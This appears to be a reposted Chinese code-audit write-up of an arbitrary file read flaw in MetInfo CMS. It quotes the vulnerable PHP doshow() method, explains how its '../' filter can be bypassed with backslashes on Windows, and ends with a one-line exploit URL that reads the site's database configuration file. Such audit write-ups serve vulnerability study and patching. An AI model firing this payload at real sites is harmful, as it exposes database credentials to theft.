代碼審計-MetInfo CMS任意文件讀取漏洞


0x01 代碼分析

發現在app\system\include\module\old_thumb.class.php疑似有任意文件讀取漏洞

public function doshow(){
        global $_M;

         $dir = str_replace(array('../','./'), '', $_GET['dir']);


        if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
            header("Content-type: image/jpeg");
            ob_start();
            readfile($dir);
            ob_flush();
            flush();
            die;
        }

頁面建立old_thumb 類,並創建dbshow方法 2.程序首先過濾…/./兩個特殊字符,然后要求字符必須以http開頭,並且不能檢測到./字符,最后讀取文件內容。 3.看似過濾非常完美,但是依然能夠繞過,windows下可以使用…\繞過

 

 

0x02 漏洞利用

http://192.168.5.172/include/thumb.php?dir=http\..\..\config\config_db.php

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM